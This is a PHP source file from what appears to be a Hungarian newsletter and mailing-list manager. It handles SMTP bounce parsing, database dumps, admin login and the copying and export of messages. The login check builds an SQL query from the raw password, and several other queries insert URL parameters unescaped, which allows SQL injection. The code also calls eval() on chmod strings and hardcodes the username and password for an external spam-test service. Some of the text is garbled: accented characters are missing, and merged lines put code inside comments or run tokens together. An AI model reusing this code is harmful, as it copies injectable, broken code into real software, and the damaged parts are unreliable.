    if (preg_match("/\s \(? \#? 5\.7\.8 \)? \s/x", $str)) return array(34, 0, '5.7.8');
    if (preg_match("/\s \(? \#? 5\.0\.0 \)? \s/x", $str)) return array(35, 0, '5.0.0');

    if (preg_match("/domain\s+syntax/i", $str)) return array(3, 0, 'domain syntax');
    if (preg_match("/route\s+to\s+host/i", $str)) return array(3, 0, 'route to host');
    if (preg_match("/connection\s+refused/i", $str)) return array(3, 0, 'connection refused');
    if (preg_match("/no\s+data\s+record\s+of\s+requested\s+type/i", $str)) return array(3, 0, 'no data record of requested type');

    if (preg_match("/\s timeout \s/x", $str)) return array(36, 0, 'timeout');
    if (preg_match("/timed\s+out/i", $str)) return array(3, 0, 'timeout');

    if (preg_match("/Rate limit applied/i", $str)) return array(100, 0, 'rate limit applied');
    if (preg_match("/mail server temporarily rejected message/i", $str)) return array(100, 0, 'mail server temporarily rejected message');


    if (preg_match("/\s450\s/", $str)) return array(2, 1, 'inactive user');
    if (preg_match("/\s550\s/", $str)) return array(2, 1, 'user not exists');
    if (preg_match("/\s551\s/", $str)) return array(2, 1, 'user not exists');
/*		
Code	Description
421 	service not available, closing transmission channel
450 	Requested mail action not taken: mailbox unavailable (e.g., mailbox busy)
451 	Requested action aborted: error in processing
452 	Requested action not taken: insufficient system storage
500 	The server could not recognize the command due to a syntax error.
501 	A syntax error was encountered in command arguments.
502 	This command is not implemented.
503 	The server has encountered a bad sequence of commands.
504 	A command parameter is not implemented.
550 	Users mailbox was unavailable (not found)
551 	The recipient is not local to the server.
552 	The action was aborted due to exceeded storage allocation.
553 	The command was aborted because the mailbox name is invalid.
554 	The transaction failed for some unstated reason.

https://www.iana.org/assignments/smtp-enhanced-status-codes/smtp-enhanced-status-codes.xhtml
https://tools.ietf.org/html/rfc3463#section-3
     */
    return array(37, 0, 'unknown');
  }

  function error($regi, $uj)
  {
    if ($regi > 100) return ($regi + $uj * 10000);
    elseif ($regi) return ($regi + $uj * 100);
    else return $uj;
  }
}

class MySQLDump
{
  function dumpDatabase($database)
  {
    
    $myprefix = DB_PREFIX;
    header('Content-Type: text/html; charset=utf-8');
    echo "SET CHARACTER SET utf8;\r\n\r\n";
    echo "SET NAMES utf8;\r\n\r\n";
    $db = @mysql_select_db($database);
    if (!empty($db)) {
      $c = 0;
      $result = mysql_list_tables($database);
      for ($x = 0; $x < mysql_num_rows($result); $x++) {
        $table = mysql_tablename($result, $x);
        if (substr($table, 0, strlen($myprefix)) == $myprefix) {
          if (!empty($table)) {
            $arr_tables[$c] = mysql_tablename($result, $x);
            $c++;
          }
        }
      }
      $dump = '';
      for ($y = 0; $y < count($arr_tables); $y++) {
        $table = $arr_tables[$y];
        $structure = "-- \n";
        $structure .= "-- Table structure for table `{$table}` \n";
        $structure .= "-- \n\n";
        $structure .= "DROP TABLE IF EXISTS `{$table}`; \n";
        $structure .= "CREATE TABLE `{$table}` (\n";
        $result = mysql_db_query($database, "SHOW FIELDS FROM `{$table}`");
        while ($row = mysql_fetch_object($result)) {
          $structure .= " `{$row->Field}` {$row->Type}";
          if ((!empty($row->Default)))
            if ($row->Default != 'CURRENT_TIMESTAMP')
            $structure .= " DEFAULT '{$row->Default}'";

          $structure .= ($row->Null != "YES") ? " NOT NULL" : false;
          $structure .= (!empty($row->Extra)) ? " {$row->Extra}" : false;
          $structure .= ",\n";
        }
        $structure = preg_replace("/,\n$/", "", $structure);

        $index = '';
        $result = mysql_db_query($database, "SHOW KEYS FROM `{$table}`");
        while ($row = mysql_fetch_object($result)) {
          if (($row->Key_name == 'PRIMARY') and ($row->Index_type == 'BTREE')) {
            $index['PRIMARY'][$row->Key_name] = $row->Column_name;
          }
          if (($row->Key_name != 'PRIMARY') and ($row->Non_unique == '0') and ($row->Index_type == 'BTREE')) {
            $index['UNIQUE'][$row->Key_name] = $row->Column_name;
          }
          if (($row->Key_name != 'PRIMARY') and ($row->Non_unique == '1') and ($row->Index_type == 'BTREE')) {
            $index['INDEX'][$row->Key_name] = $row->Column_name;
          }
          if (($row->Key_name != 'PRIMARY') and ($row->Non_unique == '1') and ($row->Index_type == 'FULLTEXT')) {
            $index['FULLTEXT'][$row->Key_name] = $row->Column_name;
          }
        }
        if (is_array($index)) {
          foreach ($index as $xy => $columns) {
            $structure .= ",\n";
            $c = 0;
            foreach ($columns as $column_key => $column_name) {
              $c++;
              $structure .= ($xy == "PRIMARY") ? " PRIMARY KEY (`{$column_name}`)" : false;
              $structure .= ($xy == "UNIQUE") ? " UNIQUE KEY `{$column_key}` (`{$column_name}`)" : false;
              $structure .= ($xy == "INDEX") ? " KEY `{$column_key}` (`{$column_name}`)" : false;
              $structure .= ($xy == "FULLTEXT") ? " FULLTEXT `{$column_key}` (`{$column_name}`)" : false;
              $structure .= ($c < (count($index[$xy]))) ? ",\n" : false;
            }
          }
        }
        $structure .= "\n);\n\n";
        $structure .= "-- \n";
        $structure .= "-- Dumping data for table `$table` \n";
        $structure .= "-- \n\n";
        echo $structure;

        unset($data);
        $result = mysql_query("SELECT * FROM `$table`");
        $num_rows = mysql_num_rows($result);
        $num_fields = mysql_num_fields($result);
        for ($i = 0; $i < $num_rows; $i++) {
          $row = mysql_fetch_object($result);
          echo "INSERT INTO `$table` "/*(";
					for ($x = 0; $x < $num_fields; $x++) {
						$field_name = mysql_field_name($result, $x);
						echo "`{$field_name}`";
						echo ($x < ($num_fields - 1)) ? ", " : false;
					}
					echo ")*/ . " VALUES (";
          for ($x = 0; $x < $num_fields; $x++) {
            $field_name = mysql_field_name($result, $x);
            echo "'" . str_replace('\"', '"', mysql_real_escape_string($row->$field_name)) . "'";
            echo ($x < ($num_fields - 1)) ? ", " : false;
          }
          echo ");\n";
        }
        echo "\n";
//				echo $structure . $data;
        echo "-- --------------------------------------------------------\n\n";
      }
			//return $dump;
    }
  }
}

include('class.sendmail.php');

class wg6_main_class extends wg6_sender_class
{

  function csvr($line, $spe = ',', $ij = '"', $esc = '\\')
  {

    $tomb = array();
    if (is_string($spe) && is_string($ij)) {
      $hl = '\x' . dechex(ord($spe));
      $awij = '\x' . dechex(ord($ij));
      $awesc = '\x' . dechex(ord($esc));
      $line = trim($line);
      $q1 = 0;
      while (strlen($line) > 0) {
        if ($line[0] == $ij) {
          preg_match('/^' . $awij . '((?:[^' . $awij . ']|(?<=' . $awesc . ')' . $awij . ')*)' . $awij . $hl . '?(.*)$/', $line, $m);
          $value = preg_replace('/' . $awesc . $awij . '/', $ij, $m[1]);
          $line = trim($m[2]);
          $tomb[$q1++] = $value;

        } else {
          preg_match('/^((?:[^' . $hl . ']|(?<=' . $awesc . ')' . $hl . ')*)' . $hl . '?(.*)$/', $line, $m);
          $value = preg_replace('/' . $awesc . $hl . '/', $spe, $m[1]);
          $line = trim($m[2]);
          $tomb[$q1++] = $value;
        }
      }
    }
    return $tomb;
  }


  function isValidEmail($email)
  {
    if (!preg_match('/^[_a-z0-9-]+(\.[_a-z0-9-]+)*(\+[a-z0-9-]+)?@[a-z0-9-]+(\.[a-z0-9-]{2,})+$/i', $email) && strlen($email) <= 50) return false;
    if (!filter_var($email, FILTER_VALIDATE_EMAIL)) return false;

    return true;
  }

  function spam_ellenoriz($minta, $szoveg)
  {
    $minta = str_replace("*", "(.*)", $minta);
    if (is_array($szoveg))
      foreach ($szoveg as $v) {
      $s = explode(chr(0x20), strtolower($v));
      foreach ($s as $szo) {
        foreach ($minta as $k => $spam)
          if (preg_match("/^" . strtolower($spam) . "$/i", $szo)) return $k;
      }
    } else {
      $s = explode(chr(0x20), strtolower($szoveg));
      foreach ($s as $szo) {
        foreach ($minta as $k => $spam)
          if (preg_match("/^" . strtolower($spam) . "$/i", $szo)) return $k;
      }
    }

  }

  function dir_size($path)
  {
    $totalsize = 0;
    $totalcount = 0;
    $dircount = 0;
    if ($handle = @opendir($path)) {
      while (false !== ($file = readdir($handle))) {
        $nextpath = $path . '/' . $file;
        if ($file != '.' && $file != '..' && !is_link($nextpath)) {
          if (is_dir($nextpath)) {
            $dircount++;
            $result = $this->dir_size($nextpath);
            $totalsize += $result['size'];
            $totalcount += $result['count'];
            $dircount += $result['dircount'];
          } elseif (is_file($nextpath)) {
            $totalsize += filesize($nextpath);
            $totalcount++;
          }
        }
      }
      closedir($handle);
    }
    $total['size'] = $totalsize;
    $total['count'] = $totalcount;
    $total['dircount'] = $dircount;
    return $total;
  }

  function deleteDirectory($dirname, $only_empty = false)
  {
    $hiba = 0;
    if (!is_dir($dirname))
      return false;
    $dscan = array(realpath($dirname));
    $darr = array();
    while (!empty($dscan)) {
      $dcur = array_pop($dscan);
      $darr[] = $dcur;
      if ($d = opendir($dcur)) {
        while (false !== ($f = readdir($d))) {
          if ($f == '.' || $f == '..')
            continue;
          $f = $dcur . '/' . $f;
          if (is_dir($f))
            $dscan[] = $f;
          else
            unlink($f);
        }
        closedir($d);
      }
    }
    $i_until = ($only_empty) ? 1 : 0;
    for ($i = count($darr) - 1; $i >= $i_until; $i--) {
      if (!@rmdir($darr[$i])) $hiba = 1;
    }
    return (($only_empty) ? (count(scandir) <= 2) : (!is_dir($dirname)));
  }


function menu($get, $nev, $badge = false, $varj = false)
{
	if ($varj) 
		$varj = ' onclick="varj()"';
	else 
		$varj = '';
	if ($get) {
		?>
		<li class="<?php if (isset($_GET[$get])) echo 'active'; ?>">
			<a href="?g=<?php echo $_GET['g']; ?>&<?php echo $get; ?>=1" <?php echo $varj; ?>>
				<?php echo $nev; ?>
				<?php if($badge) { ?>
				<span class="badge badge-pill badge-wg float-right" title=""><?php echo $badge; ?></span>
				<?php } ?>
			</a>
		</li>
		<?php

	}		
}


function microtime_float()
{
  list($usec, $sec) = explode(" ", microtime());
  return ((float)$usec + (float)$sec);
}


function meghiv($url, $script = '')
{
  global $_SERVER;
  $https = $this->conf_read("https");
  if (!$script) $script = $_SERVER['SCRIPT_NAME'];
  $fsport = $this->conf_read('fsock_port');
  $fsock_domain = explode(":", $_SERVER['HTTP_HOST']);

  if ($https == '1')
    $fp = @fsockopen(("ssl://" . $fsock_domain[0]), $fsport ? $fsport : 443, $errno, $errstr, 2);
  else
    $fp = fsockopen($fsock_domain[0], $fsport ? $fsport : 80, $errno, $errstr, 30);

  if ($fp) {
    $out = "GET $script?$url HTTP/1.1\r\n";
    $out .= "Host: " . $fsock_domain[0] . "\r\n";
    $out .= 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0' . "\r\n";
    $out .= "Connection: Close\r\n\r\n";
    fwrite($fp, $out);
    usleep(100000);
    $out = '';
			/*
			while (!feof($fp)) {
			$out .= fgets($fp, 128);
			}
			echo $out;
		//	*/
    fclose($fp);
  } else {
    echo ('fsockopen error... -- $errno: ' . $errno . ' -- $errstr: ' . $errstr);
    die('<br /><br />' . __('Kritikus fsockopen hiba.'));
  }
}


function meghiv2($q)
{//die($q);
  global $_SERVER;
  $https = $this->conf_read("https");
  $fsport = $this->conf_read('fsock_port');
		
		//printr($_SERVER);
  $fsock_domain = explode(":", $_SERVER['HTTP_HOST']);

  if ($https == '1')
    $fp = @fsockopen(("ssl://" . $fsock_domain[0]), $fsport ? $fsport : 443, $errno, $errstr, 10);
  else
    $fp = fsockopen($fsock_domain[0], $fsport ? $fsport : 80, $errno, $errstr, 10);

  if ($fp) {
    $out = "GET $_SERVER[SCRIPT_NAME]?$q&t=" . time() . " HTTP/1.1\r\n";
    $out .= "Host: " . $fsock_domain[0] . "\r\n";
    $out .= 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0' . "\r\n";
    $out .= "Connection: Close\r\n\r\n";
    fwrite($fp, $out);
    usleep(100000);
	//echo $out;
	//echo "<br>";
    $out = '';
	/** /		while (!feof($fp)) {
				$out .= fgets($fp, 128);
			}
			echo $out;
     /**/

    fclose($fp);
  } else {
    echo ('fsockopen error... -- $errno: ' . $errno . ' -- $errstr: ' . $errstr);
    die('<br /><br />' . __('Kritikus fsockopen hiba.'));
  }

}function belephet($password)
{
  
  global $out;
  global $sec;
  global $elrontotta;
  $elrontotta = '';
  $belephet = 0;

  if ($password) {
		 //echo "xx$password";
    $q = $this->mq("SELECT * FROM `".DB_PREFIX."config` WHERE wg_conf='admin_password' and conf_value=PASSWORD('$password')");
    if (mysql_num_rows($q)) $belephet = mysql_fetch_assoc($q);
    else $belephet = 0;
    $x = $this->conf_read("e_log");
    if ($x > 2) {
      $t = $this->conf_read('not_logged');
      $sec = ($x - 1) * 2;
      if ($sec > 60) $sec = 60;
      if ((time() - $t) < $sec) {
				 // $out=sprintf (__('Mivel mr tbb mint 3x elrontottad a jelszt vrnod kell <b>%s msodperc</b>et, s utna jra prblkozhatsz!'), $sec);
        $elrontotta = "<script>elrontotta($sec);</script>";
        $belephet = 0;
      }
      if ($password && !$belephet) $this->conf_update('not_logged', (string)(time()));
    }

    if ($password && !$belephet) $this->mq("update `".DB_PREFIX."config` set conf_value=conf_value+1 where wg_conf='e_log'");
    if ($belephet) {
      $this->mq("update `".DB_PREFIX."config` set conf_value=0 where wg_conf='e_log'");

      if (!isset($_POST['pswre'])) 
				$_POST['pswre'] = '';
				
				// log --
      $sid = session_id();
      $ip = $this->getip();
      $sm = $this->m_array("Select * from ".DB_PREFIX."loginstat where sessid='$sid'", 'ip');

      if (!$sm) {
				// mg nincs- ltrehozzuk
        $this->mq("insert into `".DB_PREFIX."loginstat` (`sessid`, `ip`, `datetime`) values ('$sid', '$ip' , now())");
      } elseif ($ip != $sm && (!defined('WG_LOGIN_IP_SESSION') || 'WG_LOGIN_IP_SESSION' != 'disabled')) {
				// ha ms ip-vel van ugyanazzal a sessionid-vel --> betrs
        echo __("Megvltozott az ip cmed! Biztonsgi okokbl nem hasznlhatod tovbb ezt a munkamenet azonostt! Csukd be a bngszdet vagy krj j azonostt, majd jelentkezz be jra!") .
          '<br><br><a href="?newsessid">' . __('Krek j munkamenet azonostt!') . '</a>';
        die();
      }

      return true;
    } else return false;
  }
}
function mail_select_Generator($name, $id, $szoveg = false, $wh = '')
{
  global $_g;
  if ($szoveg == false)
    $szoveg = __('Ne kldjn');

  $sql = $this->mq("select * from `".DB_PREFIX."messages` where g='$_GET[g]' and text like '%$wh%' order by name");
  ?>	  
		<select class="custom-select" name="<?php echo $name; ?>" id="<?php echo $name; ?>">
			<?php if ($szoveg) { ?>
			<option value=0><?php echo $szoveg; ?></option>
			<?php 
} ?>
			<?php while ($s = mysql_fetch_array($sql)) { ?>
				<option value="<?php echo $s['id']; ?>" <?php echo $id == $s['id'] ? "selected" : ""; ?>><?php echo htmlspecialchars($s['name']); ?></option>
			<?php 
} ?>
		</select>
		<?php

} // select_Generator ; function group_cx_Generator($name, $exp)
{
  global $_g;
  
  $array = explode(";", $exp);
  $sql = $this->mq("select * from `".DB_PREFIX."groups` where id!='$_GET[g]' order by name");
  while ($x = mysql_fetch_array($sql)) { ?>
			 <div class="felsorol">
         <input type="checkbox" class="check" name="<?php echo $name; ?>[]" value="<?php echo $x['id']; ?>" id="wg2_<?php echo $name; ?>_<?php echo $x['id']; ?>"<?php echoin_array($x['id'], $array) ? " checked" : ""; ?>>
         <label for="wg2_<?php echo $name; ?>_<?php echo $x['id']; ?>"><?php echo $x['name']; ?></label></div><?php 
	}
}


function spamCheck($spamtest_id) 
{
	$spamtest_username = 'spamtest';
	$spamtest_password = 'spamtest8';
	$spamtest_url = 'http://caa.ens.hu/index.php/spamtest/check/'.$spamtest_id;
	//echo $spamtest_url; exit;
	if(function_exists('curl_init')) {
		$ch = curl_init();
		curl_setopt($ch, CURLOPT_URL, $spamtest_url);
		curl_setopt($ch, CURLOPT_HEADER, 0);
		curl_setopt($ch, CURLOPT_USERPWD, $spamtest_username . ":" . $spamtest_password);
		curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0');
		curl_setopt($ch, CURLOPT_TIMEOUT, 30);
		curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
		curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
		$data = curl_exec($ch);
		curl_close($ch);
	} else {
		_e('A tesztelshez szksges, hogy a webtrhelyen engedlyezve legyen a curl fggvnytr, amely jelen esetben nem hasznlhat. Vedd fel ez gyben a kapcsolatot a trhelyszolgltatddal.');
		exit;
	}

	$data = preg_replace('/\t+/', ' ', $data);
	$data = str_replace("\r\n ", " ", $data);
	$data = preg_split("/\r\n|\n|\r/", $data);

	foreach($data as $param) {
		if($param){
			list($before, $after) = explode(':', $param, 2);
			$result[ $before ] = $after;
			
			if($before == 'X-Spam-Score')
				break;
		}
	}
	//_p($data);
	
	if(!$result) {
		return false;
	} else {
		if($result['X-Spam-Score'] >= 5 ) {
			$result['spam-result'] = '[SPAM]';
		} elseif($result['X-Spam-Score'] < 2 ) {
			$result['spam-result'] = '[NOT-SPAM]';
		} else {
			$result['spam-result'] = '[SPAM-OR-NOT-SPAM]';
		}
		return $result;
	}
}

function generateCode($length = 6)
{
	$Code = "";
	mt_srand((double)microtime() * 1000000);
	while (strlen($Code) < $length) {
		$random = mt_rand(48, 122);
		$random = md5($random);
		$Code .= str_replace('0', 'k', substr($random, 17, 1));
	}
	return $Code;
}


function sql_list_max()
{
	$sql = $this->mq("select * from `".DB_PREFIX."config` where wgconf='lista'");
	$s = mysql_fetch_assoc($sql);
	return $s['conf_value'];
}


function code2utf($number)
{
	if ($number < 0)
		return false;

	if ($number < 128)
		return chr($number);

// Removing / Replacing Windows Illegals Characters
	if ($number < 160) {
		if ($number == 128) $number = 8364;
		elseif ($number == 129) $number = 160; // (Rayo:) #129 using no relevant sign, thus, mapped to the saved-space #160
		elseif ($number == 130) $number = 8218;
		elseif ($number == 131) $number = 402;
		elseif ($number == 132) $number = 8222;
		elseif ($number == 133) $number = 8230;
		elseif ($number == 134) $number = 8224;
		elseif ($number == 135) $number = 8225;
		elseif ($number == 136) $number = 710;
		elseif ($number == 137) $number = 8240;
		elseif ($number == 138) $number = 352;
		elseif ($number == 139) $number = 8249;
		elseif ($number == 140) $number = 338;
		elseif ($number == 141) $number = 160; // (Rayo:) #129 using no relevant sign, thus, mapped to the saved-space #160
		elseif ($number == 142) $number = 381;
		elseif ($number == 143) $number = 160; // (Rayo:) #129 using no relevant sign, thus, mapped to the saved-space #160
		elseif ($number == 144) $number = 160; // (Rayo:) #129 using no relevant sign, thus, mapped to the saved-space #160
		elseif ($number == 145) $number = 8216;
		elseif ($number == 146) $number = 8217;
		elseif ($number == 147) $number = 8220;
		elseif ($number == 148) $number = 8221;
		elseif ($number == 149) $number = 8226;
		elseif ($number == 150) $number = 8211;
		elseif ($number == 151) $number = 8212;
		elseif ($number == 152) $number = 732;
		elseif ($number == 153) $number = 8482;
		elseif ($number == 154) $number = 353;
		elseif ($number == 155) $number = 8250;
		elseif ($number == 156) $number = 339;
		elseif ($number == 157) $number = 160; // (Rayo:) #129 using no relevant sign, thus, mapped to the saved-space #160
		elseif ($number == 158) $number = 382;
		elseif ($number == 159) $number = 376;
	} //if

	if ($number < 2048)
		return chr(($number >> 6) + 192) . chr(($number & 63) + 128);
	if ($number < 65536)
		return chr(($number >> 12) + 224) . chr((($number >> 6) & 63) + 128) . chr(($number & 63) + 128);
	if ($number < 2097152)
		return chr(($number >> 18) + 240) . chr((($number >> 12) & 63) + 128) . chr((($number >> 6) & 63) + 128) . chr(($number & 63) + 128);

	return false;
} //code2utf()


function clean_string($string)
{
	$string = str_replace('.', 'QA32cdsggr345gbgbdb3t34dcqqQcthpvefivjYXCFVethb666', $string);
	$r = preg_replace("/[^[:space:]a-zA-Z0-9-]/", "_", $string);
	$r = str_replace("-", "_", $r);
	$r = str_replace('QA32cdsggr345gbgbdb3t34dcqqQcthpvefivjYXCFVethb666', '.', $r);
	return $r;
}

function dash($string)
{
	$inArray = array("", "", "", "", "", "", "", "", "", "", "", "", "", "", "", "", "", "", "-", "/", "\\", "'", " ");
	$outArray = array("a", "i", "u", "o", "u", "o", "u", "o", "e", "A", "I", "U", "O", "U", "O", "U", "O", "E", "", "", "", "", "-");
	return $this->clean_string(str_replace("--", "-", trim(str_replace($inArray, $outArray, $string))));
}

function sql_generate()
	{
		$dump = new MySQLDump();
		$fajlnev = "wg_" . date("Y_m_d") . ".sql";
		header("Content-Type: application/xxx");
		header("Content-Disposition: attachment; filename=\"" . trim(htmlentities($fajlnev)) . "\"");
		header("Cache-Control: cache, must-revalidate");
		header("Pragma: cache");
		header("Connection: close");
		$dump->dumpDatabase(DB_DATABASE);
		exit;
}

function fields_copy($from_gid, $to_gid)
                                                        {
	global $Referer_nev;

	$from_group = (int)$from_gid;
	$to_group = (int)$to_gid;
	$from_group_data = $this->m_array("select email_field, email2_field from `".DB_PREFIX."groups` where id=$from_group");
	$to_group_data = $this->m_array("select email_field, email2_field from `".DB_PREFIX."groups` where id=$to_group");
	$sql = $this->mq("select * from ".DB_PREFIX."fields where g = $from_group");
	while ($field = mysql_fetch_assoc($sql)) {
// kizrjuk az alapvet mezk msolst
		if ($field['name'] == $Referer_nev || $from_group_data['email_field'] == $field['id'] || $from_group_data['email2_field'] == $field['id']) {
// mieltt tovbblpek belltom az e-mail mezk pozcijt
			if ($from_group_data['email_field'] == $field['id']) {
				$this->mq("update ".DB_PREFIX."fields set `hely` = '$field[hely]' where id = " . $to_group_data['email_field']);
			} elseif ($from_group_data['email2_field'] == $field['id']) {
				$this->mq("update ".DB_PREFIX."fields set `hely` = '$field[hely]' where id = " . $to_group_data['email2_field']);
			}
			continue;
		}

// ha mr van ilyen meznv akkor hozzadom a nvhez a pontos idt
		if ($this->mq_count("select count(id) from ".DB_PREFIX."fields where g = $to_group and name = '" . $field['name'] . "' "))
			$field['name'] = $field['name'] . ' (' . date('Y-m-d H:i:s') . ')';

		$this->mq("insert into ".DB_PREFIX."fields (`g`, `name`, `default`, `check`, `hidden`, `type`, `hely`, `option`, `modifiable`) values ($to_group, '" . $field['name'] . "', '" . $field['default'] . "', '" . $field['check'] . "', '" . $field['hidden'] . "', '" . $field['type'] . "', '" . $field['hely'] . "', '" . $field['option'] . "', '" . $field['modifiable'] . "')");
		$id = mysql_insert_id();

// ltrehozzuk a meghatrozott rtk mezk rtkeit
		if ($field['type'] == 2 || $field['type'] == 4 || $field['type'] == 3) { // radio, select
			$field['default'] = ';' . $field['default'] . ';';
			$new_default = '';
			$sql2 = $this->mq("select * from ".DB_PREFIX."fields_fields where field_id = '" . $field['id'] . "'");
			while ($field_option = mysql_fetch_assoc($sql2)) {
				$this->mq("insert into ".DB_PREFIX."fields_fields (field_id, name, hely) values ($id, '" . $field_option['name'] . "', '" . $field_option['hely'] . "')");
				$fid = mysql_insert_id();

				if (strpos($field['default'], ';' . $field_option['id'] . ';') !== false) {
					$new_default .= $fid . ';';
				}
			}
			$new_default = substr($new_default, 0, -1);
			$this->mq("update ".DB_PREFIX."fields set `default` = '$new_default' where id = $id");
		}
	}

	return true;
}


function form_copy($id, $g)
{
	
	$m = $this->m_array("select * from `".DB_PREFIX."forms` where id='$id'");
	unset($m['id']);
	if ($m['g'] != $g)
		unset($m['wizard_steps']);
	$m['g'] = $g;
	$m['form_page'] = $this->generateCode(10);
	$m['form_name'] = sprintf(__('%s msolata'), $m['form_name']);
	$form_field = $form_values = '';
	foreach ($m as $key => $val) {
		$form_field .= "`$key`, ";
		$form_values .= "'" . mysql_real_escape_string($val) . "', ";
	}
	$form_field = substr($form_field, 0, -2);
	$form_values = substr($form_values, 0, -2);

	$this->mq("insert into `".DB_PREFIX."forms` ($form_field) values ($form_values) ");

	return true;
}

function message_copy($mid, $g)
{
	
	$m = $this->m_array("select * from `".DB_PREFIX."messages` where id='$mid'");
	$mid2 = $this->a_i("".DB_PREFIX."messages");
	$m['text'] = str_replace("files/images/$mid/", "files/images/$mid2/", $m['text']);
	$code = $this->generateCode(38);
	if ($m['g'] != $g)
		$this->mq("insert into ".DB_PREFIX."messages (name, subject, text, date, g, code, html_only, template_name, template_params, extract) values ('" . mysql_real_escape_string($m['name']) . "', '" . mysql_real_escape_string($m['subject']) . "', '" . mysql_real_escape_string($m['text']) . "', '" . date("Y-m-d") . "', '$g', '$code', '" . (int)$m['html_only'] . "', '" . mysql_real_escape_string($m['template_name']) . "', '" . mysql_real_escape_string($m['template_params']) . "', '" . mysql_real_escape_string($m['extract']) . "')");
	else
		$this->mq("insert into ".DB_PREFIX."messages (name, subject, text, date, g, code, html_only, template_name, template_params, extract) values ('" . mysql_real_escape_string($m['name']) . " msolata', '" . mysql_real_escape_string($m['subject']) . "', '" . mysql_real_escape_string($m['text']) . "', '" . date("Y-m-d") . "', '$g', '$code', '" . (int)$m['html_only'] . "', '" . mysql_real_escape_string($m['template_name']) . "', '" . mysql_real_escape_string($m['template_params']) . "', '" . mysql_real_escape_string($m['extract']) . "')");

	if (is_dir("../files/images/$mid/")) {
		if (!is_dir("../files/images/$mid2/")) @mkdir("../files/images/$mid2/");
		$chd = $this->conf_read("chmod_dir");
		if ($chd > 100 && $chd <= 777) {
			$e = "chmod('../files/images/$id/', 0" . (int)($chd) . ");";
			eval($e);
		}
		$kvt = opendir("../files/images/$mid/");
		while (gettype($fajl = readdir($kvt)) != "boolean") {
			if ((is_file("../files/images/$mid/$fajl")) && ($fajl != "..") && ($fajl != ".")) {
				$file2 = "../files/images/$mid2/" . $fajl;
				if (!file_exists($file2)) {
					$handle = fopen("../files/images/$mid/$fajl", "r");
					$contents = fread($handle, filesize("../files/images/$mid/$fajl"));
					fclose($handle);
					$handle = fopen($file2, 'w');
					fwrite($handle, $contents);
					fclose($handle);
					$chf = $this->conf_read("chmod_file");
					if ($chf > 100 && $chf <= 777) {
						$e = "chmod('$file2', 0" . (int)($chf) . ");";
						eval($e);
					}
				}
			}
		}
	}
	
	if($this->conf_read("mail_link_clicks") == '1') {
		$regexp = '!<a\s[^>]*href[\s]*=[\s]*["\']{1}([\w]+?://[\w#$%&~/.\-;:=,?@\[\]+]*)["\']{1}.*?>(.*?)<\/a>!';
		if(preg_match_all($regexp, $m['text'], $matches, PREG_SET_ORDER)) { 
			foreach($matches as $match) {
				if(strstr($match[1], 'subscriber.php')) 
					continue;
				$match[1] = str_replace('&amp;', '&', $match[1]);
				if(!$this->m_array("Select * from ".DB_PREFIX."link_stat where link='$match[1]' and mid='$mid2'")) {
					do {
						$code = $this->generateCode(8);
					} 
					while($this->m_array("Select * from ".DB_PREFIX."link_stat where code='$code'"));
					$this->mq("insert into ".DB_PREFIX."link_stat (link, code, mid, g) values ('".mysql_real_escape_string($match[1])."', '$code', '$mid2', '$g')");
				}
			}
		}
	}
				
	return ($m['g'] == $g);
}


function message_download($mid)
{
	
	$m = $this->m_array("select * from `".DB_PREFIX."messages` where id='$mid'");
	// ha sablon tpus
	if($m['template_name']) {
		$this->saveWGMxml($m);
		//saveWGMxml($html, $head, $style_data, $content_data);
	} else {
		header("Content-Type: application/WG2");
		header("Content-Disposition: attachment; filename=\"" . trim(htmlentities($this->dash($m['name']) . ".wgm")) . "\"");
		header("Cache-Control: cache, must-revalidate");
		header("Pragma: cache");
		header("Connection: close");

		if ($this->conf_read('https') == '1') $https = "https";
		else $https = "http";
		echo (base64_encode("WEBGALAMB2 MESSAGE FILE"));
		echo ("\\"); // fjl eleje
		echo (base64_encode($m['name']));
		echo ("\\"); // levl neve
		echo (base64_encode($m['subject']));
		echo ("\\"); // levl trgya
		echo (base64_encode(preg_replace("#$https\://+[a-z0-9\./\-_%]+/images/$mid/#i", '{ELERES}/', $m['text'])));
		echo ("\\"); // zenet szvege
	//echo(base64_encode(str_replace("images/$mid/", "images/{MID}/",$m['text'])));echo("\\"); // zenet szvege
		echo (base64_encode($m['date']));
		echo ("\\"); // ltrehozs dtuma		if (is_dir("files/images/$mid/")) {
			$kvt = opendir("files/images/$mid/");
			while (gettype($fajl = readdir($kvt)) != 'boolean') {
				if ((is_file("files/images/$mid/$fajl")) && ($fajl != "..") && ($fajl != ".")) {
					echo (base64_encode($fajl));
					echo "|";
					$handle = fopen("files/images/$mid/$fajl", "r");
					$contents = fread($handle, filesize("files/images/$mid/$fajl"));
					fclose($handle);
					echo (base64_encode($contents));
					echo ("\\");
				}
			}
		}
	}
	exit;
}

//function saveWGMxml($html, $head, $style_data, $content_data, $name, $subject, $template_name) {
function saveWGMxml($message) {
	include_once('class.ExSimpleXMLElement.php');

	$file_name = trim(htmlentities($this->dash($message['name'])));
	$dom = new domDocument;
	$dom->loadHTML($message['text']);
	$dom->preserveWhiteSpace = false;
	$images = $dom->getElementsByTagName('img');
	
	$template = new ExSimpleXMLElement('<template />');
	
	$template->addChild('version', '@WGX_template 0.1');
	
	$data = $template->addChild('data');
	$data->addChild('name', $message['name']);
	$data->addChild('template_name', $message['template_name']);
	$data->addChild('subject', $message['subject']);
	$data->addChild('extract', $message['extract']);
	$data->addChild('date', $message['date']);
	
	
	$imgs = $template->addChild('images');
	$i = 1;
	foreach ($images as $image) {
		$img_url = $image->getAttribute('src');
		$imagetype = @exif_imagetype($img_url);
		$file_info = pathinfo($img_url);
		$image_name = basename($img_url);
			
		if($imagetype == 1)
			$image_name = $file_info['filename'].'.gif';
		elseif($imagetype == 2)
			$image_name = $file_info['filename'].'.jpg';
		elseif($imagetype == 3)
			$image_name = $file_info['filename'].'.png';
		else
			continue;
			
		$file = file_get_contents($img_url);
		
		
		// a 600px-nl szlesebb kpek tmretezse 600px szlesre
		$source = imagecreatefromstring($file);
		$width = imagesx($source);
		$height = imagesy($source);
		$newwidth = 600;
		if($width > $newwidth) {
			$rate = 600 / $width;
			$newheight = $height * $rate;
			
